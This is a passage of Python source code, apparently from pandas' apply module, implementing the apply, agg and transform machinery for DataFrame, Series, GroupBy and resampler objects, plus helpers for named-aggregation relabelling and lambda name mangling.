klass = FrameColumnApply
return klass(
obj,
func,
raw=raw,
result_type=result_type,
args=args,
kwargs=kwargs,
)
class Apply(metaclass=abc.ABCMeta):
axis: int
def __init__(
self,
obj: AggObjType,
func,
raw: bool,
result_type: str | None,
args,
kwargs,
):
self.obj = obj
self.raw = raw
self.args = args or ()
self.kwargs = kwargs or {}
if result_type not in [None, "reduce", "broadcast", "expand"]:
raise ValueError(
"invalid value for result_type, must be one "
"of {None, 'reduce', 'broadcast', 'expand'}"
)
self.result_type = result_type
# curry if needed
if (
(kwargs or args)
and not isinstance(func, (np.ufunc, str))
and not is_list_like(func)
):
def f(x):
return func(x, *args, **kwargs)
else:
f = func
self.orig_f: AggFuncType = func
self.f: AggFuncType = f
@abc.abstractmethod
def apply(self) -> DataFrame | Series:
pass
def agg(self) -> DataFrame | Series | None:
"""
Provide an implementation for the aggregators.
Returns
-------
Result of aggregation, or None if agg cannot be performed by
this method.
"""
obj = self.obj
arg = self.f
args = self.args
kwargs = self.kwargs
if isinstance(arg, str):
return self.apply_str()
if is_dict_like(arg):
return self.agg_dict_like()
elif is_list_like(arg):
# we require a list, but not a 'str'
return self.agg_list_like()
if callable(arg):
f = com.get_cython_func(arg)
if f and not args and not kwargs:
return getattr(obj, f)()
# caller can react
return None
def transform(self) -> DataFrame | Series:
"""
Transform a DataFrame or Series.
Returns
-------
DataFrame or Series
Result of applying ``func`` along the given axis of the
Series or DataFrame.
Raises
------
ValueError
If the transform function fails or does not transform.
"""
obj = self.obj
func = self.orig_f
axis = self.axis
args = self.args
kwargs = self.kwargs
is_series = obj.ndim == 1
if obj._get_axis_number(axis) == 1:
assert not is_series
return obj.T.transform(func, 0, *args, **kwargs).T
if is_list_like(func) and not is_dict_like(func):
func = cast(List[AggFuncTypeBase], func)
# Convert func equivalent dict
if is_series:
func = {com.get_callable_name(v) or v: v for v in func}
else:
func = {col: func for col in obj}
if is_dict_like(func):
func = cast(AggFuncTypeDict, func)
return self.transform_dict_like(func)
# func is either str or callable
func = cast(AggFuncTypeBase, func)
try:
result = self.transform_str_or_callable(func)
except TypeError:
raise
except Exception as err:
raise ValueError("Transform function failed") from err
# Functions that transform may return empty Series/DataFrame
# when the dtype is not appropriate
if (
isinstance(result, (ABCSeries, ABCDataFrame))
and result.empty
and not obj.empty
):
raise ValueError("Transform function failed")
if not isinstance(result, (ABCSeries, ABCDataFrame)) or not result.index.equals(
obj.index
):
raise ValueError("Function did not transform")
return result
def transform_dict_like(self, func):
"""
Compute transform in the case of a dict-like func
"""
from pandas.core.reshape.concat import concat
obj = self.obj
args = self.args
kwargs = self.kwargs
# transform is currently only for Series/DataFrame
assert isinstance(obj, ABCNDFrame)
if len(func) == 0:
raise ValueError("No transform functions were provided")
func = self.normalize_dictlike_arg("transform", obj, func)
results: dict[Hashable, DataFrame | Series] = {}
failed_names = []
all_type_errors = True
for name, how in func.items():
colg = obj._gotitem(name, ndim=1)
try:
results[name] = colg.transform(how, 0, *args, **kwargs)
except Exception as err:
if str(err) in {
"Function did not transform",
"No transform functions were provided",
}:
raise err
else:
if not isinstance(err, TypeError):
all_type_errors = False
failed_names.append(name)
# combine results
if not results:
klass = TypeError if all_type_errors else ValueError
raise klass("Transform function failed")
if len(failed_names) > 0:
warnings.warn(
f"{failed_names} did not transform successfully. If any error is "
f"raised, this will raise in a future version of pandas. "
f"Drop these columns/ops to avoid this warning.",
FutureWarning,
stacklevel=find_stack_level(),
)
return concat(results, axis=1)
def transform_str_or_callable(self, func) -> DataFrame | Series:
"""
Compute transform in the case of a string or callable func
"""
obj = self.obj
args = self.args
kwargs = self.kwargs
if isinstance(func, str):
return self._try_aggregate_string_function(obj, func, *args, **kwargs)
if not args and not kwargs:
f = com.get_cython_func(func)
if f:
return getattr(obj, f)()
# Two possible ways to use a UDF - apply or call directly
try:
return obj.apply(func, args=args, **kwargs)
except Exception:
return func(obj, *args, **kwargs)
def agg_list_like(self) -> DataFrame | Series:
"""
Compute aggregation in the case of a list-like argument.
Returns
-------
Result of aggregation.
"""
from pandas.core.reshape.concat import concat
obj = self.obj
arg = cast(List[AggFuncTypeBase], self.f)
if not isinstance(obj, SelectionMixin):
# i.e. obj is Series or DataFrame
selected_obj = obj
elif obj._selected_obj.ndim == 1:
# For SeriesGroupBy this matches _obj_with_exclusions
selected_obj = obj._selected_obj
else:
selected_obj = obj._obj_with_exclusions
results = []
keys = []
failed_names = []
depr_nuisance_columns_msg = (
"{} did not aggregate successfully. If any error is "
"raised this will raise in a future version of pandas. "
"Drop these columns/ops to avoid this warning."
)
# degenerate case
if selected_obj.ndim == 1:
for a in arg:
colg = obj._gotitem(selected_obj.name, ndim=1, subset=selected_obj)
try:
new_res = colg.aggregate(a)
except TypeError:
failed_names.append(com.get_callable_name(a) or a)
else:
results.append(new_res)
# make sure we find a good name
name = com.get_callable_name(a) or a
keys.append(name)
# multiples
else:
indices = []
for index, col in enumerate(selected_obj):
colg = obj._gotitem(col, ndim=1, subset=selected_obj.iloc[:, index])
try:
# Capture and suppress any warnings emitted by us in the call
# to agg below, but pass through any warnings that were
# generated otherwise.
# This is necessary because of https://bugs.python.org/issue29672
# See GH #43741 for more details
with warnings.catch_warnings(record=True) as record:
new_res = colg.aggregate(arg)
if len(record) > 0:
match = re.compile(depr_nuisance_columns_msg.format(".*"))
for warning in record:
if re.match(match, str(warning.message)):
failed_names.append(col)
else:
warnings.warn_explicit(
message=warning.message,
category=warning.category,
filename=warning.filename,
lineno=warning.lineno,
)
except (TypeError, DataError):
failed_names.append(col)
except ValueError as err:
# cannot aggregate
if "Must produce aggregated value" in str(err):
# raised directly in _aggregate_named
failed_names.append(col)
elif "no results" in str(err):
# reached in test_frame_apply.test_nuiscance_columns
# where the colg.aggregate(arg) ends up going through
# the selected_obj.ndim == 1 branch above with arg == ["sum"]
# on a datetime64[ns] column
failed_names.append(col)
else:
raise
else:
results.append(new_res)
indices.append(index)
keys = selected_obj.columns.take(indices)
# if we are empty
if not len(results):
raise ValueError("no results")
if len(failed_names) > 0:
warnings.warn(
depr_nuisance_columns_msg.format(failed_names),
FutureWarning,
stacklevel=find_stack_level(),
)
try:
concatenated = concat(results, keys=keys, axis=1, sort=False)
except TypeError as err:
# we are concatting non-NDFrame objects,
# e.g. a list of scalars
from pandas import Series
result = Series(results, index=keys, name=obj.name)
if is_nested_object(result):
raise ValueError(
"cannot combine transform and aggregation operations"
) from err
return result
else:
# Concat uses the first index to determine the final indexing order.
# The union of a shorter first index with the other indices causes
# the index sorting to be different from the order of the aggregating
# functions. Reindex if this is the case.
index_size = concatenated.index.size
full_ordered_index = next(
result.index for result in results if result.index.size == index_size
)
return concatenated.reindex(full_ordered_index, copy=False)
def agg_dict_like(self) -> DataFrame | Series:
"""
Compute aggregation in the case of a dict-like argument.
Returns
-------
Result of aggregation.
"""
from pandas import Index
from pandas.core.reshape.concat import concat
obj = self.obj
arg = cast(AggFuncTypeDict, self.f)
if not isinstance(obj, SelectionMixin):
# i.e. obj is Series or DataFrame
selected_obj = obj
selection = None
else:
selected_obj = obj._selected_obj
selection = obj._selection
arg = self.normalize_dictlike_arg("agg", selected_obj, arg)
if selected_obj.ndim == 1:
# key only used for output
colg = obj._gotitem(selection, ndim=1)
results = {key: colg.agg(how) for key, how in arg.items()}
else:
# key used for column selection and output
results = {
key: obj._gotitem(key, ndim=1).agg(how) for key, how in arg.items()
}
# set the final keys
keys = list(arg.keys())
# Avoid making two isinstance calls in all and any below
is_ndframe = [isinstance(r, ABCNDFrame) for r in results.values()]
# combine results
if all(is_ndframe):
keys_to_use: Iterable[Hashable]
keys_to_use = [k for k in keys if not results[k].empty]
# Have to check, if at least one DataFrame is not empty.
keys_to_use = keys_to_use if keys_to_use != [] else keys
if selected_obj.ndim == 2:
# keys are columns, so we can preserve names
ktu = Index(keys_to_use)
ktu._set_names(selected_obj.columns.names)
keys_to_use = ktu
axis = 0 if isinstance(obj, ABCSeries) else 1
result = concat(
{k: results[k] for k in keys_to_use}, axis=axis, keys=keys_to_use
)
elif any(is_ndframe):
# There is a mix of NDFrames and scalars
raise ValueError(
"cannot perform both aggregation "
"and transformation operations "
"simultaneously"
)
else:
from pandas import Series
# we have a dict of scalars
# GH 36212 use name only if obj is a series
if obj.ndim == 1:
obj = cast("Series", obj)
name = obj.name
else:
name = None
result = Series(results, name=name)
return result
def apply_str(self) -> DataFrame | Series:
"""
Compute apply in case of a string.
Returns
-------
result: Series or DataFrame
"""
# Caller is responsible for checking isinstance(self.f, str)
f = cast(str, self.f)
obj = self.obj
# Support for `frame.transform('method')`
# Some methods (shift, etc.) require the axis argument, others
# don't, so inspect and insert if necessary.
func = getattr(obj, f, None)
if callable(func):
sig = inspect.getfullargspec(func)
if "axis" in sig.args:
self.kwargs["axis"] = self.axis
elif self.axis != 0:
raise ValueError(f"Operation {f} does not support axis=1")
return self._try_aggregate_string_function(obj, f, *self.args, **self.kwargs)
def apply_multiple(self) -> DataFrame | Series:
"""
Compute apply in case of a list-like or dict-like.
Returns
-------
result: Series, DataFrame, or None
Result when self.f is a list-like or dict-like, None otherwise.
"""
return self.obj.aggregate(self.f, self.axis, *self.args, **self.kwargs)
def normalize_dictlike_arg(
self, how: str, obj: DataFrame | Series, func: AggFuncTypeDict
) -> AggFuncTypeDict:
"""
Handler for dict-like argument.
Ensures that necessary columns exist if obj is a DataFrame, and
that a nested renamer is not passed. Also normalizes to all lists
when values consists of a mix of list and non-lists.
"""
assert how in ("apply", "agg", "transform")
# Can't use func.values(); wouldn't work for a Series
if (
how == "agg"
and isinstance(obj, ABCSeries)
and any(is_list_like(v) for _, v in func.items())
) or (any(is_dict_like(v) for _, v in func.items())):
# GH 15931 - deprecation of renaming keys
raise SpecificationError("nested renamer is not supported")
if obj.ndim != 1:
# Check for missing columns on a frame
cols = set(func.keys()) - set(obj.columns)
if len(cols) > 0:
cols_sorted = list(safe_sort(list(cols)))
raise KeyError(f"Column(s) {cols_sorted} do not exist")
is_aggregator = lambda x: isinstance(x, (list, tuple, dict))
# if we have a dict of any non-scalars
# eg. {'A' : ['mean']}, normalize all to
# be list-likes
# Cannot use func.values() because arg may be a Series
if any(is_aggregator(x) for _, x in func.items()):
new_func: AggFuncTypeDict = {}
for k, v in func.items():
if not is_aggregator(v):
# mypy can't realize v is not a list here
new_func[k] = [v] # type:ignore[list-item]
else:
new_func[k] = v
func = new_func
return func
def _try_aggregate_string_function(self, obj, arg: str, *args, **kwargs):
"""
if arg is a string, then try to operate on it:
- try to find a function (or attribute) on ourselves
- try to find a numpy function
- raise
"""
assert isinstance(arg, str)
f = getattr(obj, arg, None)
if f is not None:
if callable(f):
return f(*args, **kwargs)
# people may try to aggregate on a non-callable attribute
# but don't let them think they can pass args to it
assert len(args) == 0
assert len([kwarg for kwarg in kwargs if kwarg not in ["axis"]]) == 0
return f
f = getattr(np, arg, None)
if f is not None and hasattr(obj, "__array__"):
# in particular exclude Window
return f(obj, *args, **kwargs)
raise AttributeError(
f"'{arg}' is not a valid function for '{type(obj).__name__}' object"
)
class NDFrameApply(Apply):
"""
Methods shared by FrameApply and SeriesApply but
not GroupByApply or ResamplerWindowApply
"""
@property
def index(self) -> Index:
return self.obj.index
@property
def agg_axis(self) -> Index:
return self.obj._get_agg_axis(self.axis)
class FrameApply(NDFrameApply):
obj: DataFrame
# ---------------------------------------------------------------
# Abstract Methods
@property
@abc.abstractmethod
def result_index(self) -> Index:
pass
@property
@abc.abstractmethod
def result_columns(self) -> Index:
pass
@property
@abc.abstractmethod
def series_generator(self) -> Iterator[Series]:
pass
@abc.abstractmethod
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
pass
# ---------------------------------------------------------------
@property
def res_columns(self) -> Index:
return self.result_columns
@property
def columns(self) -> Index:
return self.obj.columns
@cache_readonly
def values(self):
return self.obj.values
@cache_readonly
def dtypes(self) -> Series:
return self.obj.dtypes
def apply(self) -> DataFrame | Series:
"""compute the results"""
# dispatch to agg
if is_list_like(self.f):
return self.apply_multiple()
# all empty
if len(self.columns) == 0 and len(self.index) == 0:
return self.apply_empty_result()
# string dispatch
if isinstance(self.f, str):
return self.apply_str()
# ufunc
elif isinstance(self.f, np.ufunc):
with np.errstate(all="ignore"):
results = self.obj._mgr.apply("apply", func=self.f)
# _constructor will retain self.index and self.columns
return self.obj._constructor(data=results)
# broadcasting
if self.result_type == "broadcast":
return self.apply_broadcast(self.obj)
# one axis empty
elif not all(self.obj.shape):
return self.apply_empty_result()
# raw
elif self.raw:
return self.apply_raw()
return self.apply_standard()
def agg(self):
obj = self.obj
axis = self.axis
# TODO: Avoid having to change state
self.obj = self.obj if self.axis == 0 else self.obj.T
self.axis = 0
result = None
try:
result = super().agg()
except TypeError as err:
exc = TypeError(
"DataFrame constructor called with "
f"incompatible data and dtype: {err}"
)
raise exc from err
finally:
self.obj = obj
self.axis = axis
if axis == 1:
result = result.T if result is not None else result
if result is None:
result = self.obj.apply(self.orig_f, axis, args=self.args, **self.kwargs)
return result
def apply_empty_result(self):
"""
we have an empty result; at least 1 axis is 0
we will try to apply the function to an empty
series in order to see if this is a reduction function
"""
assert callable(self.f)
# we are not asked to reduce or infer reduction
# so just return a copy of the existing object
if self.result_type != "reduce":
return self.obj.copy()
else:
if len(self.agg_axis):
r = self.f(Series([], dtype=np.float64))
else:
r = np.nan
return self.obj._constructor_sliced(r, index=self.agg_axis)
def apply_raw(self):
"""apply to the values as a numpy array"""
def wrap_function(func):
"""
Wrap user supplied function to work around numpy issue.
see https://github.com/numpy/numpy/issues/8352
"""
def wrapper(*args, **kwargs):
result = func(*args, **kwargs)
if isinstance(result, str):
result = np.array(result, dtype=object)
return result
return wrapper
result = np.apply_along_axis(wrap_function(self.f), self.axis, self.values)
# TODO: mixed type case
if result.ndim == 2:
return self.obj._constructor(result, index=self.index, columns=self.columns)
else:
return self.obj._constructor_sliced(result, index=self.agg_axis)
def apply_broadcast(self, target: DataFrame) -> DataFrame:
assert callable(self.f)
result_values = np.empty_like(target.values)
# axis which we want to compare compliance
result_compare = target.shape[0]
for i, col in enumerate(target.columns):
res = self.f(target[col])
ares = np.asarray(res).ndim
# must be a scalar or 1d
if ares > 1:
raise ValueError("too many dims to broadcast")
elif ares == 1:
# must match return dim
if result_compare != len(res):
raise ValueError("cannot broadcast result")
result_values[:, i] = res
# we *always* preserve the original index / columns
result = self.obj._constructor(
result_values, index=target.index, columns=target.columns
)
return result
def apply_standard(self):
results, res_index = self.apply_series_generator()
# wrap results
return self.wrap_results(results, res_index)
def apply_series_generator(self) -> tuple[ResType, Index]:
assert callable(self.f)
series_gen = self.series_generator
res_index = self.result_index
results = {}
with option_context("mode.chained_assignment", None):
for i, v in enumerate(series_gen):
# ignore SettingWithCopy here in case the user mutates
results[i] = self.f(v)
if isinstance(results[i], ABCSeries):
# If we have a view on v, we need to make a copy because
# series_generator will swap out the underlying data
results[i] = results[i].copy(deep=False)
return results, res_index
def wrap_results(self, results: ResType, res_index: Index) -> DataFrame | Series:
from pandas import Series
# see if we can infer the results
if len(results) > 0 and 0 in results and is_sequence(results[0]):
return self.wrap_results_for_axis(results, res_index)
# dict of scalars
# the default dtype of an empty Series will be `object`, but this
# code can be hit by df.mean() where the result should have dtype
# float64 even if it's an empty Series.
constructor_sliced = self.obj._constructor_sliced
if constructor_sliced is Series:
result = create_series_with_explicit_dtype(
results, dtype_if_empty=np.float64
)
else:
result = constructor_sliced(results)
result.index = res_index
return result
def apply_str(self) -> DataFrame | Series:
# Caller is responsible for checking isinstance(self.f, str)
# TODO: GH#39993 - Avoid special-casing by replacing with lambda
if self.f == "size":
# Special-cased because DataFrame.size returns a single scalar
obj = self.obj
value = obj.shape[self.axis]
return obj._constructor_sliced(value, index=self.agg_axis)
return super().apply_str()
class FrameRowApply(FrameApply):
axis = 0
def apply_broadcast(self, target: DataFrame) -> DataFrame:
return super().apply_broadcast(target)
@property
def series_generator(self):
return (self.obj._ixs(i, axis=1) for i in range(len(self.columns)))
@property
def result_index(self) -> Index:
return self.columns
@property
def result_columns(self) -> Index:
return self.index
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
"""return the results for the rows"""
if self.result_type == "reduce":
# e.g. test_apply_dict GH#8735
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
elif self.result_type is None and all(
isinstance(x, dict) for x in results.values()
):
# Our operation was a to_dict op e.g.
# test_apply_dict GH#8735, test_apply_reduce_to_dict GH#25196 #37544
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
try:
result = self.obj._constructor(data=results)
except ValueError as err:
if "All arrays must be of the same length" in str(err):
# e.g. result = [[2, 3], [1.5], ['foo', 'bar']]
# see test_agg_listlike_result GH#29587
res = self.obj._constructor_sliced(results)
res.index = res_index
return res
else:
raise
if not isinstance(results[0], ABCSeries):
if len(result.index) == len(self.res_columns):
result.index = self.res_columns
if len(result.columns) == len(res_index):
result.columns = res_index
return result
class FrameColumnApply(FrameApply):
axis = 1
def apply_broadcast(self, target: DataFrame) -> DataFrame:
result = super().apply_broadcast(target.T)
return result.T
@property
def series_generator(self):
values = self.values
values = ensure_wrapped_if_datetimelike(values)
assert len(values) > 0
# We create one Series object, and will swap out the data inside
# of it. Kids: don't do this at home.
ser = self.obj._ixs(0, axis=0)
mgr = ser._mgr
if is_extension_array_dtype(ser.dtype):
# values will be incorrect for this block
# TODO(EA2D): special case would be unnecessary with 2D EAs
obj = self.obj
for i in range(len(obj)):
yield obj._ixs(i, axis=0)
else:
for (arr, name) in zip(values, self.index):
# GH#35462 re-pin mgr in case setitem changed it
ser._mgr = mgr
mgr.set_values(arr)
ser.name = name
yield ser
@property
def result_index(self) -> Index:
return self.index
@property
def result_columns(self) -> Index:
return self.columns
def wrap_results_for_axis(
self, results: ResType, res_index: Index
) -> DataFrame | Series:
"""return the results for the columns"""
result: DataFrame | Series
# we have requested to expand
if self.result_type == "expand":
result = self.infer_to_same_shape(results, res_index)
# we have a non-series and don't want inference
elif not isinstance(results[0], ABCSeries):
result = self.obj._constructor_sliced(results)
result.index = res_index
# we may want to infer results
else:
result = self.infer_to_same_shape(results, res_index)
return result
def infer_to_same_shape(self, results: ResType, res_index: Index) -> DataFrame:
"""infer the results to the same shape as the input object"""
result = self.obj._constructor(data=results)
result = result.T
# set the index
result.index = res_index
# infer dtypes
result = result.infer_objects()
return result
class SeriesApply(NDFrameApply):
obj: Series
axis = 0
def __init__(
self,
obj: Series,
func: AggFuncType,
convert_dtype: bool,
args,
kwargs,
):
self.convert_dtype = convert_dtype
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self) -> DataFrame | Series:
obj = self.obj
if len(obj) == 0:
return self.apply_empty_result()
# dispatch to agg
if is_list_like(self.f):
return self.apply_multiple()
if isinstance(self.f, str):
# if we are a string, try to dispatch
return self.apply_str()
return self.apply_standard()
def agg(self):
result = super().agg()
if result is None:
f = self.f
kwargs = self.kwargs
# string, list-like, and dict-like are entirely handled in super
assert callable(f)
# we can be called from an inner function which
# passes this meta-data
kwargs.pop("_level", None)
# try a regular apply, this evaluates lambdas
# row-by-row; however if the lambda is expected a Series
# expression, e.g.: lambda x: x-x.quantile(0.25)
# this will fail, so we can try a vectorized evaluation
# we cannot FIRST try the vectorized evaluation, because
# then .agg and .apply would have different semantics if the
# operation is actually defined on the Series, e.g. str
try:
result = self.obj.apply(f)
except (ValueError, AttributeError, TypeError):
result = f(self.obj)
return result
def apply_empty_result(self) -> Series:
obj = self.obj
return obj._constructor(dtype=obj.dtype, index=obj.index).__finalize__(
obj, method="apply"
)
def apply_standard(self) -> DataFrame | Series:
f = self.f
obj = self.obj
with np.errstate(all="ignore"):
if isinstance(f, np.ufunc):
return f(obj)
# row-wise access
if is_extension_array_dtype(obj.dtype) and hasattr(obj._values, "map"):
# GH#23179 some EAs do not have `map`
mapped = obj._values.map(f)
else:
values = obj.astype(object)._values
# error: Argument 2 to "map_infer" has incompatible type
# "Union[Callable[..., Any], str, List[Union[Callable[..., Any], str]],
# Dict[Hashable, Union[Union[Callable[..., Any], str],
# List[Union[Callable[..., Any], str]]]]]"; expected
# "Callable[[Any], Any]"
mapped = lib.map_infer(
values,
f, # type: ignore[arg-type]
convert=self.convert_dtype,
)
if len(mapped) and isinstance(mapped[0], ABCSeries):
# GH 25959 use pd.array instead of tolist
# so extension arrays can be used
return obj._constructor_expanddim(pd_array(mapped), index=obj.index)
else:
return obj._constructor(mapped, index=obj.index).__finalize__(
obj, method="apply"
)
class GroupByApply(Apply):
def __init__(
self,
obj: GroupBy[NDFrameT],
func: AggFuncType,
args,
kwargs,
):
kwargs = kwargs.copy()
self.axis = obj.obj._get_axis_number(kwargs.get("axis", 0))
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self):
raise NotImplementedError
def transform(self):
raise NotImplementedError
class ResamplerWindowApply(Apply):
axis = 0
obj: Resampler | BaseWindow
def __init__(
self,
obj: Resampler | BaseWindow,
func: AggFuncType,
args,
kwargs,
):
super().__init__(
obj,
func,
raw=False,
result_type=None,
args=args,
kwargs=kwargs,
)
def apply(self):
raise NotImplementedError
def transform(self):
raise NotImplementedError
def reconstruct_func(
func: AggFuncType | None, **kwargs
) -> tuple[bool, AggFuncType | None, list[str] | None, list[int] | None]:
"""
This is the internal function to reconstruct func given if there is relabeling
or not and also normalize the keyword to get new order of columns.
If named aggregation is applied, `func` will be None, and kwargs contains the
column and aggregation function information to be parsed;
If named aggregation is not applied, `func` is either string (e.g. 'min') or
Callable, or list of them (e.g. ['min', np.max]), or the dictionary of column name
and str/Callable/list of them (e.g. {'A': 'min'}, or {'A': [np.min, lambda x: x]})
If relabeling is True, will return relabeling, reconstructed func, column
names, and the reconstructed order of columns.
If relabeling is False, the columns and order will be None.
Parameters
----------
func: agg function (e.g. 'min' or Callable) or list of agg functions
(e.g. ['min', np.max]) or dictionary (e.g. {'A': ['min', np.max]}).
**kwargs: dict, kwargs used in is_multi_agg_with_relabel and
normalize_keyword_aggregation function for relabelling
Returns
-------
relabelling: bool, if there is relabelling or not
func: normalized and mangled func
columns: list of column names
order: list of columns indices
Examples
--------
>>> reconstruct_func(None, **{"foo": ("col", "min")})
(True, defaultdict(<class 'list'>, {'col': ['min']}), ('foo',), array([0]))
>>> reconstruct_func("min")
(False, 'min', None, None)
"""
relabeling = func is None and is_multi_agg_with_relabel(**kwargs)
columns: list[str] | None = None
order: list[int] | None = None
if not relabeling:
if isinstance(func, list) and len(func) > len(set(func)):
# GH 28426 will raise error if duplicated function names are used and
# there is no reassigned name
raise SpecificationError(
"Function names must be unique if there is no new column names "
"assigned"
)
elif func is None:
# nicer error message
raise TypeError("Must provide 'func' or tuples of '(column, aggfunc).")
if relabeling:
func, columns, order = normalize_keyword_aggregation(kwargs)
return relabeling, func, columns, order
def is_multi_agg_with_relabel(**kwargs) -> bool:
"""
Check whether kwargs passed to .agg look like multi-agg with relabeling.
Parameters
----------
**kwargs : dict
Returns
-------
bool
Examples
--------
>>> is_multi_agg_with_relabel(a="max")
False
>>> is_multi_agg_with_relabel(a_max=("a", "max"), a_min=("a", "min"))
True
>>> is_multi_agg_with_relabel()
False
"""
return all(isinstance(v, tuple) and len(v) == 2 for v in kwargs.values()) and (
len(kwargs) > 0
)
def normalize_keyword_aggregation(kwargs: dict) -> tuple[dict, list[str], list[int]]:
"""
Normalize user-provided "named aggregation" kwargs.
Transforms from the new ``Mapping[str, NamedAgg]`` style kwargs
to the old Dict[str, List[scalar]]].
Parameters
----------
kwargs : dict
Returns
-------
aggspec : dict
The transformed kwargs.
columns : List[str]
The user-provided keys.
col_idx_order : List[int]
List of columns indices.
Examples
--------
>>> normalize_keyword_aggregation({"output": ("input", "sum")})
(defaultdict(<class 'list'>, {'input': ['sum']}), ('output',), array([0]))
"""
from pandas.core.indexes.base import Index
# Normalize the aggregation functions as Mapping[column, List[func]],
# process normally, then fixup the names.
# TODO: aggspec type: typing.Dict[str, List[AggScalar]]
# May be hitting https://github.com/python/mypy/issues/5958
# saying it doesn't have an attribute __name__
aggspec: DefaultDict = defaultdict(list)
order = []
columns, pairs = list(zip(*kwargs.items()))
for column, aggfunc in pairs:
aggspec[column].append(aggfunc)
order.append((column, com.get_callable_name(aggfunc) or aggfunc))
# uniquify aggfunc name if duplicated in order list
uniquified_order = _make_unique_kwarg_list(order)
# GH 25719, due to aggspec will change the order of assigned columns in aggregation
# uniquified_aggspec will store uniquified order list and will compare it with order
# based on index
aggspec_order = [
(column, com.get_callable_name(aggfunc) or aggfunc)
for column, aggfuncs in aggspec.items()
for aggfunc in aggfuncs
]
uniquified_aggspec = _make_unique_kwarg_list(aggspec_order)
# get the new index of columns by comparison
col_idx_order = Index(uniquified_aggspec).get_indexer(uniquified_order)
# error: Incompatible return value type (got "Tuple[defaultdict[Any, Any],
# Any, ndarray]", expected "Tuple[Dict[Any, Any], List[str], List[int]]")
return aggspec, columns, col_idx_order # type: ignore[return-value]
def _make_unique_kwarg_list(
seq: Sequence[tuple[Any, Any]]
) -> Sequence[tuple[Any, Any]]:
"""
Uniquify aggfunc name of the pairs in the order list
Examples:
--------
>>> kwarg_list = [('a', '<lambda>'), ('a', '<lambda>'), ('b', '<lambda>')]
>>> _make_unique_kwarg_list(kwarg_list)
[('a', '<lambda>_0'), ('a', '<lambda>_1'), ('b', '<lambda>')]
"""
return [
(pair[0], "_".join([pair[1], str(seq[:i].count(pair))]))
if seq.count(pair) > 1
else pair
for i, pair in enumerate(seq)
]
def relabel_result(
result: DataFrame | Series,
func: dict[str, list[Callable | str]],
columns: Iterable[Hashable],
order: Iterable[int],
) -> dict[Hashable, Series]:
"""
Internal function to reorder result if relabelling is True for
dataframe.agg, and return the reordered result in dict.
Parameters:
----------
result: Result from aggregation
func: Dict of (column name, funcs)
columns: New columns name for relabelling
order: New order for relabelling
Examples:
---------
>>> result = DataFrame({"A": [np.nan, 2, np.nan],
... "C": [6, np.nan, np.nan], "B": [np.nan, 4, 2.5]}) # doctest: +SKIP
>>> funcs = {"A": ["max"], "C": ["max"], "B": ["mean", "min"]}
>>> columns = ("foo", "aab", "bar", "dat")
>>> order = [0, 1, 2, 3]
>>> _relabel_result(result, func, columns, order) # doctest: +SKIP
dict(A=Series([2.0, NaN, NaN, NaN], index=["foo", "aab", "bar", "dat"]),
C=Series([NaN, 6.0, NaN, NaN], index=["foo", "aab", "bar", "dat"]),
B=Series([NaN, NaN, 2.5, 4.0], index=["foo", "aab", "bar", "dat"]))
"""
from pandas.core.indexes.base import Index
reordered_indexes = [
pair[0] for pair in sorted(zip(columns, order), key=lambda t: t[1])
]
reordered_result_in_dict: dict[Hashable, Series] = {}
idx = 0
reorder_mask = not isinstance(result, ABCSeries) and len(result.columns) > 1
for col, fun in func.items():
s = result[col].dropna()
# In the `_aggregate`, the callable names are obtained and used in `result`, and
# these names are ordered alphabetically. e.g.
# C2 C1
# <lambda> 1 NaN
# amax NaN 4.0
# max NaN 4.0
# sum 18.0 6.0
# Therefore, the order of functions for each column could be shuffled
# accordingly so need to get the callable name if it is not parsed names, and
# reorder the aggregated result for each column.
# e.g. if df.agg(c1=("C2", sum), c2=("C2", lambda x: min(x))), correct order is
# [sum, <lambda>], but in `result`, it will be [<lambda>, sum], and we need to
# reorder so that aggregated values map to their functions regarding the order.
# However there is only one column being used for aggregation, not need to
# reorder since the index is not sorted, and keep as is in `funcs`, e.g.
# A
# min 1.0
# mean 1.5
# mean 1.5
if reorder_mask:
fun = [
com.get_callable_name(f) if not isinstance(f, str) else f for f in fun
]
col_idx_order = Index(s.index).get_indexer(fun)
s = s[col_idx_order]
# assign the new user-provided "named aggregation" as index names, and reindex
# it based on the whole user-provided names.
s.index = reordered_indexes[idx : idx + len(fun)]
reordered_result_in_dict[col] = s.reindex(columns, copy=False)
idx = idx + len(fun)
return reordered_result_in_dict
# TODO: Can't use, because mypy doesn't like us setting __name__
# error: "partial[Any]" has no attribute "__name__"
# the type is:
# typing.Sequence[Callable[..., ScalarResult]]
# -> typing.Sequence[Callable[..., ScalarResult]]:
def _managle_lambda_list(aggfuncs: Sequence[Any]) -> Sequence[Any]:
"""
Possibly mangle a list of aggfuncs.
Parameters
----------
aggfuncs : Sequence
Returns
-------
mangled: list-like
A new AggSpec sequence, where lambdas have been converted
to have unique names.
Notes
-----
If just one aggfunc is passed, the name will not be mangled.
"""
if len(aggfuncs) <= 1:
# don't mangle for .agg([lambda x: .])
return aggfuncs
i = 0
mangled_aggfuncs = []
for aggfunc in aggfuncs:
if com.get_callable_name(aggfunc) == "<lambda>":
aggfunc = partial(aggfunc)
aggfunc.__name__ = f"<lambda_{i}>"
i += 1
mangled_aggfuncs.append(aggfunc)
return mangled_aggfuncs
def maybe_mangle_lambdas(agg_spec: Any) -> Any:
"""
Make new lambdas with unique names.
Parameters
----------
agg_spec : Any
An argument to GroupBy.agg.
Non-dict-like `agg_spec` are pass through as is.
For dict-like `agg_spec` a new spec is returned
with name-mangled lambdas.
Returns
-------
mangled : Any
Same type as the input.
Examples
--------
>>> maybe_mangle_lambdas('sum')
'sum'
>>> maybe_mangle_lambdas([lambda: 1, lambda: 2]) # doctest: +SKIP
[<function __main__.<lambda_0>,
<function pandas...._make_lambda.<locals>.f(*args, **kwargs)>]
"""
is_dict = is_dict_like(agg_spec)
if not (is_dict or is_list_like(agg_spec)):
return agg_spec
mangled_aggspec = type(agg_spec)() # dict or OrderedDict
if is_dict:
for key, aggfuncs in agg_spec.items():
if is_list_like(aggfuncs) and not is_dict_like(aggfuncs):
mangled_aggfuncs = _managle_lambda_list(aggfuncs)
else:
mangled_aggfuncs = aggfuncs
mangled_aggspec[key] = mangled_aggfuncs
